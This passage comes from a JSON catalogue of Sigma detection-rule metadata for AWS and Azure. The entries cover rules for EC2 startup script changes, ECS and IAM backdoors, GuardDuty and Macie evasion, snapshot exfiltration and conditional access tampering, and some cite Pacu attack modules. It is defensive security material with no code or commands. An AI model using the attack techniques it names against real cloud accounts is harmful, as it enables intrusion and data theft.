"filename": "aws_ec2_startup_script_change.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_startup_script_change.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.004" - ] - }, - "uuid": "1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df", - "value": "AWS EC2 Startup Shell Script Change" - }, - { - "description": "An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.", - "meta": { - "author": "Diogo Braz", - "creation_date": "2020/04/16", - "falsepositive": "No established falsepositives", - "filename": "aws_ec2_vm_export_failure.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_vm_export_failure.yml" - ], - "tags": [ - "attack.collection", - "attack.t1005", - "attack.exfiltration", - "attack.t1537" - ] - }, - "uuid": "54b9a76a-3c71-4673-b4b3-2edb4566ea7b", - "value": "AWS EC2 VM Export Failure" - }, - { - "description": "Detects when an Elastic Container Service (ECS) Task Definition has been modified and run.\nThis can indicate an adversary adding a backdoor to establish persistence or escalate privileges.\nThis rule is based on examining events created upon execution of Rhino Security Lab's Pacu in a lab environment.\n", - "meta": { - "author": "Darin Smith", - "creation_date": "2022/06/07", - "falsepositive": [ - "Task Definition being modified to request credentials from the Task Metadata Service for valid reasons" - ], - "filename": "aws_ecs_task_definition_backdoor.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", - "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", - "https://attack.mitre.org/techniques/T1525", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1525" - ] - }, - "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad", - "value": "AWS ECS Backdoor Task Definition" - }, - { - "description": "Detects when a EFS Fileshare is modified or deleted.\nYou can't delete a file system that is in use.\nIf the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/15", - "falsepositive": [ - "Unknown" - ], - "filename": "aws_efs_fileshare_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "25cb1ba1-8a19-4a23-a198-d252664c8cef", - "value": "AWS EFS Fileshare Modified or Deleted" - }, - { - "description": "Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/15", - "falsepositive": [ - "Unknown" - ], - "filename": "aws_efs_fileshare_mount_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ] - }, - "uuid": "6a7ba45c-63d8-473e-9736-2eaabff79964", - "value": "AWS EFS Fileshare Mount Modified or Deleted" - }, - { - "description": "Identifies when an EKS cluster is created or deleted.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/16", - "falsepositive": [ - "EKS Cluster being created or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "aws_eks_cluster_created_or_deleted.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://any-api.com/amazonaws_com/eks/docs/API_Description", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ] - }, - "uuid": "33d50d03-20ec-4b74-a74e-1e65a38af1c0", - "value": "AWS EKS Cluster Created or Deleted" - }, - { - "description": "Detects when an ElastiCache security group has been created.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/07/24", - "falsepositive": [ - "A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "aws_elasticache_security_group_created.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_created.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136", - "attack.t1136.003" - ] - }, - "uuid": "4ae68615-866f-4304-b24b-ba048dfa5ca7", - "value": "AWS ElastiCache Security Group Created" - }, - { - "description": "Identifies when an ElastiCache security group has been modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/07/24", - "falsepositive": [ - "A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "aws_elasticache_security_group_modified_or_deleted.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1531" - ] - }, - "uuid": "7c797da2-9cf2-4523-ba64-33b06339f0cc", - "value": "AWS ElastiCache Security Group Modified or Deleted" - }, - { - "description": "Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time.", - "meta": { - "author": "toffeebr33k", - "creation_date": "2020/11/21", - "falsepositive": [ - "AWS Config or other configuration scanning activities" - ], - "filename": "aws_enum_listing.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_listing.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1592" - ] - }, - "uuid": "e9c14b23-47e2-4a8b-8a63-d36618e33d70", - "value": "Account Enumeration on AWS" - }, - { - "description": "Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.", - "meta": { - "author": "faloker", - "creation_date": "2020/02/11", - "falsepositive": [ - "Valid change in the GuardDuty (e.g. to ignore internal scanners)" - ], - "filename": "aws_guardduty_disruption.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_guardduty_disruption.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "6e61ee20-ce00-4f8d-8aee-bedd8216f7e3", - "value": "AWS GuardDuty Important Change" - }, - { - "description": "Detects AWS API key creation for a user by another user.\nBackdoored users can be used to obtain persistence in the AWS environment.\nAlso with this alert, you can detect a flow of AWS keys in your org.\n", - "meta": { - "author": "faloker", - "creation_date": "2020/02/12", - "falsepositive": [ - "Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)", - "AWS API keys legitimate exchange workflows" - ], - "filename": "aws_iam_backdoor_users_keys.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_iam_backdoor_users_keys.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2", - "value": "AWS IAM Backdoor Users Keys" - }, - { - "description": "Detects when an user creates or invokes a lambda function.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/10/03", - "falsepositive": [ - "Lambda Function created or invoked may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "aws_lambda_function_created_or_invoked.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1078" - ] - }, - "uuid": "d914951b-52c8-485f-875e-86abab710c0b", - "value": "AWS Lambda Function Created or Invoked" - }, - { - "description": "Detects evade to Macie detection.", - "meta": { - "author": "Sittikorn S", - "creation_date": "2021/07/06", - "falsepositive": [ - "System or Network administrator behaviors" - ], - "filename": "aws_macic_evasion.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/cli/latest/reference/macie/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_macic_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "91f6a16c-ef71-437a-99ac-0b070e3ad221", - "value": "AWS Macie Evasion" - }, - { - "description": "Detects possible suspicious glue development endpoint activity.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/10/03", - "falsepositive": [ - "Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "aws_passed_role_to_glue_development_endpoint.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", - "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26", - "value": "AWS Glue Development Endpoint Activity" - }, - { - "description": "Detects the change of database master password. It may be a part of data exfiltration.", - "meta": { - "author": "faloker", - "creation_date": "2020/02/12", - "falsepositive": [ - "Benign changes to a db instance" - ], - "filename": "aws_rds_change_master_password.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_change_master_password.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ] - }, - "uuid": "8a63cdd4-6207-414a-85bc-7e032bd3c1a2", - "value": "AWS RDS Master Password Change" - }, - { - "description": "Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.", - "meta": { - "author": "faloker", - "creation_date": "2020/02/12", - "falsepositive": [ - "Unknown" - ], - "filename": "aws_rds_public_db_restore.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_public_db_restore.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ] - }, - "uuid": "c3f265c7-ff03-4056-8ab2-d486227b4599", - "value": "Restore Public AWS RDS Instance" - }, - { - "description": "Detects AWS root account usage", - "meta": { - "author": "vitaliy0x1", - "creation_date": "2020/01/21", - "falsepositive": [ - "AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html" - ], - "filename": "aws_root_account_usage.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_root_account_usage.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1078.004" - ] - }, - "uuid": "8ad1600d-e9dc-4251-b0ee-a65268f29add", - "value": "AWS Root Credentials" - }, - { - "description": "Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.", - "meta": { - "author": "Elastic, Austin Songer @austinsonger", - "creation_date": "2021/07/22", - "falsepositive": [ - "A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "aws_route_53_domain_transferred_lock_disabled.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", - "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", - "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml" - ], - "tags": [ - "attack.persistence", - "attack.credential_access", - "attack.t1098" - ] - }, - "uuid": "3940b5f1-3f46-44aa-b746-ebe615b879e0", - "value": "AWS Route 53 Domain Transfer Lock Disabled" - }, - { - "description": "Detects when a request has been made to transfer a Route 53 domain to another AWS account.", - "meta": { - "author": "Elastic, Austin Songer @austinsonger", - "creation_date": "2021/07/22", - "falsepositive": [ - "A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "aws_route_53_domain_transferred_to_another_account.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml" - ], - "tags": [ - "attack.persistence", - "attack.credential_access", - "attack.t1098" - ] - }, - "uuid": "b056de1a-6e6e-4e40-a67e-97c9808cf41b", - "value": "AWS Route 53 Domain Transferred to Another Account" - }, - { - "description": "Detects when a user tampers with S3 data management in Amazon Web Services.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/07/24", - "falsepositive": [ - "A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "aws_s3_data_management_tampering.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/elastic/detection-rules/pull/1145/files", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", - "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1537" - ] - }, - "uuid": "78b3756a-7804-4ef7-8555-7b9024a02e2d", - "value": "AWS S3 Data Management Tampering" - }, - { - "description": "Detects the modification of the findings on SecurityHub.", - "meta": { - "author": "Sittikorn S", - "creation_date": "2021/06/28", - "falsepositive": [ - "System or Network administrator behaviors", - "DEV, UAT, SAT environment. You should apply this rule with PROD environment only." - ], - "filename": "aws_securityhub_finding_evasion.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/cli/latest/reference/securityhub/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_securityhub_finding_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ] - }, - "uuid": "a607e1fe-74bf-4440-a3ec-b059b9103157", - "value": "AWS SecurityHub Findings Evasion" - }, - { - "description": "Detects the modification of an EC2 snapshot's permissions to enable access from another account", - "meta": { - "author": "Darin Smith", - "creation_date": "2021/05/17", - "falsepositive": [ - "Valid change to a snapshot's permissions" - ], - "filename": "aws_snapshot_backup_exfiltration.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://www.justice.gov/file/1080281/download", - "https://attack.mitre.org/techniques/T1537/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1537" - ] - }, - "uuid": "abae8fec-57bd-4f87-aff6-6e3db989843d", - "value": "AWS Snapshot Backup Exfiltration" - }, - { - "description": "Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/07/24", - "falsepositive": [ - "AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.", - "Automated processes that uses Terraform may lead to false positives." - ], - "filename": "aws_sts_assumerole_misuse.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/elastic/detection-rules/pull/1214", - "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_assumerole_misuse.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1548", - "attack.t1550", - "attack.t1550.001" - ] - }, - "uuid": "905d389b-b853-46d0-9d3d-dea0d3a3cd49", - "value": "AWS STS AssumeRole Misuse" - }, - { - "description": "Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/07/24", - "falsepositive": [ - "GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "aws_sts_getsessiontoken_misuse.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/elastic/detection-rules/pull/1213", - "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1548", - "attack.t1550", - "attack.t1550.001" - ] - }, - "uuid": "b45ab1d2-712f-4f01-a751-df3826969807", - "value": "AWS STS GetSessionToken Misuse" - }, - { - "description": "Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/09/22", - "falsepositive": [ - "Automated processes that uses Terraform may lead to false positives.", - "SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "aws_susp_saml_activity.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", - "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_susp_saml_activity.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078", - "attack.lateral_movement", - "attack.t1548", - "attack.privilege_escalation", - "attack.t1550", - "attack.t1550.001" - ] - }, - "uuid": "f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e", - "value": "AWS Suspicious SAML Activity" - }, - { - "description": "An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.\nWith this alert, it is used to detect anyone is changing password on behalf of other users.\n", - "meta": { - "author": "toffeebr33k", - "creation_date": "2021/08/09", - "falsepositive": [ - "Legit User Account Administration" - ], - "filename": "aws_update_login_profile.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_update_login_profile.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "055fb148-60f8-462d-ad16-26926ce050f1", - "value": "AWS User Login Profile Was Modified" - }, - { - "description": "This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.\nA threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server.\nThis can be done programmatically via HTTP requests to Azure.\n", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "creation_date": "2021/08/26", - "falsepositive": [ - "Legitimate AD FS servers added to an AAD Health AD FS service instance" - ], - "filename": "azure_aadhybridhealth_adfs_new_server.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://o365blog.com/post/hybridhealthagent/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1578" - ] - }, - "uuid": "288a39fc-4914-4831-9ada-270e9dc12cb4", - "value": "Azure Active Directory Hybrid Health AD FS New Server" - }, - { - "description": "This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.\nA threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.\nThe health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.\n", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "creation_date": "2021/08/26", - "falsepositive": [ - "Legitimate AAD Health AD FS service instances being deleted in a tenant" - ], - "filename": "azure_aadhybridhealth_adfs_service_delete.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://o365blog.com/post/hybridhealthagent/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1578.003" - ] - }, - "uuid": "48739819-8230-4ee3-a8ea-e0289d1fb0ff", - "value": "Azure Active Directory Hybrid Health AD FS Service Delete" - }, - { - "description": "Monitor and alert on conditional access changes where non approved actor removed CA Policy.", - "meta": { - "author": "Corissa Koopmans, '@corissalea'", - "creation_date": "2022/07/19", - "falsepositive": [ - "Misconfigured role permissions", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." - ], - "filename": "azure_aad_secops_ca_policy_removedby_bad_actor.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548" - ] - }, - "uuid": "26e7c5e2-6545-481e-b7e6-050143459635", - "value": "CA Policy Removed by Non Approved Actor" - }, - { - "description": "Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare \"old\" vs \"new\" value.", - "meta": { - "author": "Corissa Koopmans, '@corissalea'", - "creation_date": "2022/07/19", - "falsepositive": [ - "Misconfigured role permissions", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." - ], - "filename": "azure_aad_secops_ca_policy_updatedby_bad_actor.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548" - ] - }, - "uuid": "50a3c7aa-ec29-44a4-92c1-fce229eef6fc", - "value": "CA Policy Updated by Non Approved Actor" - }, - { - "description": "Monitor and alert on conditional access changes.", - "meta": { - "author": "Corissa Koopmans, '@corissalea'", - "creation_date": "2022/07/18", - "falsepositive": [ - "Misconfigured role permissions", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." - ], - "filename": "azure_aad_secops_new_ca_policy_addedby_bad_actor.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548" - ] - }, - "uuid": "0922467f-db53-4348-b7bf-dee8d0d348c6", - "value": "New CA Policy by Non-approved Actor" - }, - { - "description": "Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated.", - "meta": { - "author": "Corissa Koopmans, '@corissalea'", - "creation_date": "2022/04/21", - "falsepositive": [ - "Failed Azure AD Connect Synchronization", - "Service account use with an incorrect password specified", - "Misconfigured systems", - "Vulnerability scanners" - ], - "filename": "azure_aad_secops_signin_failure_bad_password_threshold.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ] - }, - "uuid": "dff74231-dbed-42ab-ba49-83289be2ac3a", - "value": "Sign-in Failure Bad Password Threshold" - }, - { - "description": "Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.", - "meta": { - "author": "AlertIQ", - "creation_date": "2021/10/10", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_account_lockout.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_account_lockout.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ] - }, - "uuid": "2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a", - "value": "Account Lockout" - }, - { - "description": "Detects when an account was created and deleted in a short period of time.", - "meta": { - "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", - "creation_date": "2022/08/11", - "falsepositive": [ - "Legit administrative action" - ], - "filename": "azure_ad_account_created_deleted.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_account_created_deleted.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "6f583da0-3a90-4566-a4ed-83c09fe18bbf", - "value": "Account Created And Deleted Within A Close Time Frame" - }, - { - "description": "Detect successful authentications from countries you do not operate out of.", - "meta": { - "author": "MikeDuddington, '@dudders1'", - "creation_date": "2022/07/28", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "filename": "azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - 